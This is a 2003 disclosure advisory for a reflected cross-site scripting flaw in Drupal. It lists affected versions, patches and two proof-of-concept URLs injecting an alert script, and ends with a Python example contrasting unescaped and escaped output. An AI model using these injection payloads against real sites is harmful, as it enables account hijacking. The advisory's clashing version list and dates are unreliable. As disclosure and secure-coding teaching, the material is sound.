Drupal XSS Vulnerability (main page and sub pages)

20.07.2003

------------------------------------------------------
Drupal XSS Vulnerability (main page and sub pages)
------------------------------------------------------
Any kind of XSS attack is possible. An attacker could gain access to other users' or the admin's Drupal accounts.

------------------------------------------------------
About Drupal;
------------------------------------------------------
www.drupal.com
Drupal is an open-source platform and content management system for building dynamic web sites offering a broad range of features and services including user administration, publishing workflow, discussion capabilities, news aggregation, metadata functionalities using controlled vocabularies and XML publishing for content sharing purposes. Equipped with a powerful blend of features and configurability, Drupal can support a diverse range of web projects ranging from personal weblogs to large community-driven sites.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
TESTED;
Drupal 4.2.0 RC
NOT TESTED - 90% VULNERABLE;
Drupal 4.1.0 
Drupal 4.0.0
Drupal 3.0.2
Drupal 3.0.1
Drupal 3.0.0
Drupal 2.0.0
Drupal 1.0.0

------------------------------------------------------
Not Vulnerable;
------------------------------------------------------
Drupal 4.2.0 RC

------------------------------------------------------
Vendor Status;
------------------------------------------------------
Vendor replied and fixed quickly.

------------------------------------------------------
Solution & Patches;
------------------------------------------------------
download : http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip
xss-cvs.patch
xss-4.2.0-rc.patch
xss-4.1.0.patch
[All files provided by Vendor]

------------------------------------------------------
Exploit Code;
------------------------------------------------------
http://[victim]/xxx"][script]alert(document.domain)]/script]["

------------------------------------------------------
Exploit - 2;
------------------------------------------------------
http://[victim]/node/view/666"><script>alert(document.domain)</script>
Replace "<>","[]"
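
Added example, not part of the original advisory and not Drupal code: a Python model of the flaw and its fix. It assumes the request path is echoed into a double-quoted HTML attribute, which is consistent with the `">` prefix of the payloads above but is not shown on this page; all function and class names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: the request path from "Exploit - 2".
PAYLOAD_PATH = '/node/view/666"><script>alert(document.domain)</script>'


def render_unsafe(request_path):
    """Vulnerable pattern: raw request path concatenated into an attribute."""
    return '<a href="' + request_path + '">permalink</a>'


def render_safe(request_path):
    """Hardened pattern: encode &, <, >, " and ' for the attribute context."""
    return '<a href="' + html.escape(request_path, quote=True) + '">permalink</a>'


class TagCollector(HTMLParser):
    """Records the elements and href values an HTML parser sees in the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.hrefs.extend(value for name, value in attrs if name == "href")


def parse(markup):
    """Return (start tags, href values) found in the rendered markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.hrefs


if __name__ == "__main__":
    # Unsafe output gains a script element; safe output keeps the whole
    # path inside the href value, where it decodes back to the original.
    for name, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        tags, hrefs = parse(render(PAYLOAD_PATH))
        print(name, tags, hrefs)
```

In PHP the same encoding is done with `htmlspecialchars()` called with `ENT_QUOTES`, applied at the point where the value is written into the page.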

------------------------------------------------------
History;
------------------------------------------------------
30.05.2003 - Discovered
03.05.2003 - Vendor Informed
03.05.2003 - Fixed by Vendor
Ferruh Mavituna
© 2002-2007, Ferruh Mavituna